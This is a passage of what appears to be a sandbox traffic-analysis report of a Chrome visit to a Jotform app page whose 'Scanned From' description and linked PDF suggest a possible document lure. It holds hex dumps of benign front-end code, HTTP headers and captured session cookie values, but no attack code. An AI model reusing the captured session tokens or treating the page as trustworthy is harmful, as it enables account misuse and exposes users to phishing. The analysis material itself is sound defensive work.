                                                                                                                                                                                                                                            Data Ascii: content; margin: 0 auto; margin-bottom: calc(${({isOrderNowButtonVisible:e})=>e?"95px":"0px"}); `}; font-size: 1em; text-align: center; .mobileCtxMenu { position: fixed; z-index: 1001; left: 0; top: 0; width: 100%; he
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 4e 6f 77 2d 65 78 69 74 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 6e 74 65 72 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 6e 74 65 72 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 78 69 74 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72
                                                                                                                                                                                                                                            Data Ascii: all 400ms; } .orderNow-exit-active { opacity: 0; } .orderBtn-enter { opacity: 0; transition: all 400ms; } .orderBtn-enter-active { opacity: 1; } .orderBtn-exit { opacity: 1; transition: all 400ms; } .order
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 20 20 7d 0a 20 20 7d 0a 60 2c 44 3d 79 2e 5a 50 2e 64 69 76 60 0a 20 20 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 20 74 6f 75 63 68 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 0a 20 20 2e 61 63 63 42 6f 78 2d 62 61 63 6b 64 72 6f 70 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 0a 20 20 7d 0a 0a 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: } }`,D=y.ZP.div` -webkit-overflow-scrolling: touch; overflow-y: auto; position: relative; height: 100%; .accBox-backdrop { position: absolute; width: 100%; height: 100%; opacity: 0; overflow-y: auto; } iframe {
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 76 61 72 20 52 3d 65 3d 3e 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 53 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 32 30 2c 68 65 69 67 68 74 3a 32 34 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 7d 2c 65 29 2c 4f 7c 7c 28 4f 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 32 37 38 44 46 46 22 2c 64 3a 22 4d 36 2e 35 31 33 20 36 2e 37 31 33 76 31 2e 34 33 33 48 32 2e 33 30 36 63 2d 2e 33 30 33 20 30 2d 2e 35 35 37 2e 31 39 32 2d 2e 36 31 2e 34 34 31 6c 2d 2e 30 31 2e 30 39 36 76 31 33 2e 33 37 34 63 30 20 2e 32 36 32 2e 32 32 31 2e 34 38 32 2e 35 30 39 2e 35 32 38 6c 2e 31 31 31 2e 30 31 68 31 35 2e 34 34 37
                                                                                                                                                                                                                                            Data Ascii: var R=e=>i.createElement("svg",S({xmlns:"http://www.w3.org/2000/svg",width:20,height:24,fill:"none"},e),O||(O=i.createElement("path",{fill:"#278DFF",d:"M6.513 6.713v1.433H2.306c-.303 0-.557.192-.61.441l-.01.096v13.374c0 .262.221.482.509.528l.111.01h15.447
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 28 52 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 6c 2d 32 22 7d 29 7d 29 5d 7d 29 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 32 2e 20 22 2c 28 30 2c 62 2e 74 29 28 22 53 65 6c 65 63 74 20 27 41 64 64 20 74 6f 20 48 6f 6d 65 20 53 63 72 65 65 6e 27 22 29 5d 7d 29 5d 7d 29 7d 29 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 77 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6f 6c 22 2c 7b 74 79 70 65 3a 22 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 31 2e 20 22 2c 28 30 2c 62 2e 63 7a 29 28 22 54 61 70 20 74 68 65 20 5b 31 5b 7b 6f 73 49 63 6f 6e 7d 5d 5d 20 6d 65 6e 75 20
                                                                                                                                                                                                                                            Data Ascii: (R,{className:"ml-2"})})]}),(0,n.jsxs)("li",{children:["2. ",(0,b.t)("Select 'Add to Home Screen'")]})]})}):(0,n.jsx)("div",{className:"tw",children:(0,n.jsxs)("ol",{type:"1",children:[(0,n.jsxs)("li",{children:["1. ",(0,b.cz)("Tap the [1[{osIcon}]] menu
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 63 6f 6e 74 65 6e 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 2d 63 6f 6e 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 4d 2e 5a 2c 7b 61 70 70 50 72 6f 70 65 72 74 69 65 73 3a 6f 2c 64 65 66 61 75 6c 74 4c 6f 67 6f 55 52 4c 3a 63 2c 77 69 74 68 42 6f 72 64 65 72 3a 6b 7d 29 7d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 22 68 31 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 69 74 6c 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 62 2e 74 29 28 22 41 64 64 20 7b 74 69 74 6c 65 7d 20 74 6f 20 59 6f 75 72 20 48 6f 6d 65 20 53 63 72 65 65 6e 3f 22 29 2e 72 65 70 6c 61 63 65 28 22 7b 74 69 74 6c 65 7d
                                                                                                                                                                                                                                            Data Ascii: )("div",{className:"content",children:[(0,n.jsx)("div",{className:"icon-cont",children:(0,n.jsx)(M.Z,{appProperties:o,defaultLogoURL:c,withBorder:k})}),(0,n.jsx)("h1",{className:"title",children:(0,b.t)("Add {title} to Your Home Screen?").replace("{title}
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 55 7c 7c 28 55 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 36 20 31 68 31 32 61 33 20 33 20 30 20 30 20 31 20 33 20 33 76 37 2e 36 30 31 61 33 2e 37 35 37 20 33 2e 37 35 37 20 30 20 30 20 30 2d 33 2e 35 30 35 2e 32 39 35 20 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 2d 31 2e 31 33 35 2d 31 2e 30 33 36 48 37 2e 36 34 61 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 20 30 20 32 2e 32 38 68 38 2e 34 39 32 6c 2d 31 2e 35 38 20 31 2e 35 38 48 37 2e 36 34 61 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 20 30
                                                                                                                                                                                                                                            Data Ascii: 00/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),U||(U=i.createElement("path",{fillRule:"evenodd",d:"M6 1h12a3 3 0 0 1 3 3v7.601a3.757 3.757 0 0 0-3.505.295 1.14 1.14 0 0 0-1.135-1.036H7.64a1.14 1.14 0 0 0 0 2.28h8.492l-1.58 1.58H7.64a1.14 1.14 0 0 0 0
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 32 30 70 78 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 2d 65 78 69 74 2d 61 63 74 69 76 65 20 26 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 73 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 3b 0a 20 20 7d 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 48 65 61 64 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                                                                                                                                                                                                                            Data Ascii: transform: translateY(20px); } } } .mobileCtxMenu-exit-active & { transition: .4s ease-in-out 0s; transform: translateY(100%); } .mobileCtxMenuHeader { position: relative; margin-bottom: 10px; padding-botto
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6d 49 44 3a 28 30 2c 72 2e 6f 6e 65 4f 66 54 79 70 65 29 28 5b 72 2e 73 74 72 69 6e 67 2c 72 2e 6e 75 6d 62 65 72 5d 29 2e 69 73 52 65 71 75 69 72 65 64 2c 66 6f 72 6d 54 69 74 6c 65 3a 72 2e 73 74 72 69 6e 67 2c 69 74 65 6d 73 3a 28 30 2c 72 2e 61 72 72 61 79 4f 66 29 28 28 30 2c 72 2e 73 68 61 70 65 29 28 7b 7d 29 29 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 72 2e 66 75 6e 63 2c 69 73 4f 70 65 6e 3a 72 2e 62 6f 6f 6c 7d 2c 61 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 69 74 65 6d 73 3a 5b 5d 2c 66 6f 72 6d 54 69 74 6c 65 3a 22 22 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 65 3d 3e 65 2c 69 73 4f 70 65 6e 3a 21 31 7d 3b 76 61 72 20 73 65 3d 61 65 2c 6c 65 3d 6f 28 22 35 31 35 37 31 22 29 2c 63 65 3d 6f 28 22 32 35 36 38 22 29 2c 70 65 3d 6f 28 22 36
                                                                                                                                                                                                                                            Data Ascii: mID:(0,r.oneOfType)([r.string,r.number]).isRequired,formTitle:r.string,items:(0,r.arrayOf)((0,r.shape)({})),onModalClose:r.func,isOpen:r.bool},ae.defaultProps={items:[],formTitle:"",onModalClose:e=>e,isOpen:!1};var se=ae,le=o("51571"),ce=o("2568"),pe=o("6


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            71192.168.2.1749783104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC966OUTGET /app/250092704521347 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            If-Modified-Since: Fri, 10 Jan 2025 12:36:13 GMT
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1258INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            jf-trace-id: 7b7e98b4d7ca47ec
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:17 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6387b2d8c3c-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC111INData Raw: 33 36 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                            Data Ascii: 36b2<!doctype html><html lang="en-US"> <head> <meta charset="utf-8"> <meta name="robots" content="
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 35 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2b 6f 65 6d 62 65 64 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                                                                                                                                                                                            Data Ascii: noindex,nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=5"> <link rel='alternate' type='application/json+oembed' href='https://www
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 63 6f 6e 2d 32 30 32 31 2d 6c 69 67 68 74 2e 70 6e 67 27 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6c 69 6e 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 27 20 2b 20 69 63 6f 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 75 70 64 61 74 65 46 61 76 69 63 6f 6e 28 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28
                                                                                                                                                                                                                                            Data Ascii: con-2021-light.png'; var link = document.querySelector('[rel="shortcut icon"]'); if (link) { link.href = 'https://cdn.jotfor.ms/assets/img/favicons/' + icon; } } updateFavicon(window.matchMedia("(
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6e 74 65 6e 74 3d 22 4a 6f 74 66 6f 72 6d 20 41 70 70 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 2f 66 6f 72 6d 5f 66 69 6c 65 73 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 73 74 61 72 74 75 70 2d 69 6d 61 67 65 22 20 73 69 7a 65 73 3d 22 32 30 34 38 78 32 37 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74
                                                                                                                                                                                                                                            Data Ascii: ntent="Jotform Apps"/><link rel="apple-touch-icon" sizes="180x180" href="https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png" /><link rel="apple-touch-startup-image" sizes="2048x2732" href="https://eu.jot
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6f 6e 20 20 2d 2d 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 22 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 30 32 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 2f 76 65 6e 64 6f 72 2f 73 74 61 74 69 63 2f 70 77 61 63 6f 6d 70 61 74 2f 32 2e 30 2e 31 31 2f 70 77 61 63 6f 6d 70 61 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69
                                                                                                                                                                                                                                            Data Ascii: on --><link href="/app/250092704521347/manifest.json" rel="manifest" crossorigin="use-credentials" /><script src="https://cdn02.jotfor.ms/s/vendor/static/pwacompat/2.0.11/pwacompat.min.js"></script><link rel="icon" href="https://eu.jotform.com/uploads/Gi
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 74 79 6c 65 62 75 69 6c 64 65 72 2f 73 74 61 74 69 63 2f 64 6f 6e 61 74 69 6f 6e 42 6f 78 2e 63 73 73 3f 76 3d 33 66 66 39 64 33 65 0a 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 47 4f 4f 47 4c 45 5f 53 49 47 4e 4f 4e 20 3d 20 22 31 37 32 31 32 34 36 33 30 33 37 36 2d 71 6b 31 71 6d 64 66 6d 75 72 32 6f 6a 61 66 33 39 65 30 37 30 69 71 68 70 74 32 66 6f 61 69 70 2e 61 70 70 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22
                                                                                                                                                                                                                                            Data Ascii: rel="stylesheet"> <link rel="stylesheet" type="text/css" href="https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3e"> <script> window.GOOGLE_SIGNON = "172124630376-qk1qmdfmur2ojaf39e070iqhpt2foaip.apps.googleusercontent.com"
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 64 69 73 61 62 6c 65 64 41 70 70 54 65 78 74 22 3a 22 54 68 69 73 20 61 70 70 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 22 3a 22 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 54 69 6d 65 7a 6f 6e 65 22 3a 22 22 2c 22 64 69 73 61 62 6c 65 4f 6e 44 61 74 65 22 3a 22 4e 6f 22 2c 22 69 63 6f 6e 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 6e 73 74 61 6c 6c 61 62 6c 65 49 63 6f 6e 55 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f
                                                                                                                                                                                                                                            Data Ascii: "description":"Scanned From : MPD609\n","disabledAppText":"This app is currently unavailable.","disableDate":"","disableDateTimezone":"","disableOnDate":"No","iconColor":"#0A1551","installableIconURL":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/fo
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 36 37 38 31 30 31 31 32 30 36 31 38 62 34 2e 34 31 31 39 32 35 32 39 2e 70 64 66 22 2c 22 69 74 65 6d 42 67 43 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 69 74 65 6d 42 67 55 52 4c 22 3a 22 22 2c 22 69 74 65 6d 42 6f 72 64 65 72 43 6f 6c 6f 72 22 3a 22 23 44 33 44 43 45 46 22 2c 22 69 74 65 6d 46 6f 6e 74 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 74 65 6d 49 63 6f 6e 22 3a 22 22 2c 22 69 74 65 6d 49 63 6f 6e 42 67 43 6f 6c 6f 72 22 3a 22 23 46 46 46 30 22 2c 22 69 74 65 6d 49 63 6f 6e 43 6f 6c 6f 72 22 3a 22 23 64 64 31 36 31 36 22 2c 22 69 74 65 6d 54 65 78 74 41 6c 69 67 6e 6d 65 6e 74 22 3a 22 63 65 6e 74 65 72 22 2c 22 70 61 67 65 22 3a 22 30 22 2c 22 70 6f 72 74 61 6c 4f 72 64 65 72 22 3a 22 31 22 2c 22 73 68 6f 77 49 74 65 6d
                                                                                                                                                                                                                                            Data Ascii: 678101120618b4.41192529.pdf","itemBgColor":"#ffffff","itemBgURL":"","itemBorderColor":"#D3DCEF","itemFontColor":"#0A1551","itemIcon":"","itemIconBgColor":"#FFF0","itemIconColor":"#dd1616","itemTextAlignment":"center","page":"0","portalOrder":"1","showItem
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 69 6f 6e 22 3a 22 76 31 22 2c 22 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 3a 22 65 6f 79 32 30 32 34 22 2c 22 6c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 77 69 6e 64 6f 77 73 54 65 61 6d 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 73 61 6c 65 73 66 6f 72 63 65 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 73 61 6c 65 73 66 6f 72 63 65 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 42 6c 6f 67 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 66 6c 6f 77 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 61 63 61 64 65 6d 79 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62
                                                                                                                                                                                                                                            Data Ascii: ion":"v1","utm_campaign":"eoy2024","launchAssetsAvailable":false,"windowsTeamLaunchAssetsAvailable":false,"salesforceLaunchAssetsAvailable":false,"salesforceLaunchAssetsAvailableBlog":false,"workflowLaunchAssetsAvailable":false,"academyLaunchAssetsAvailab
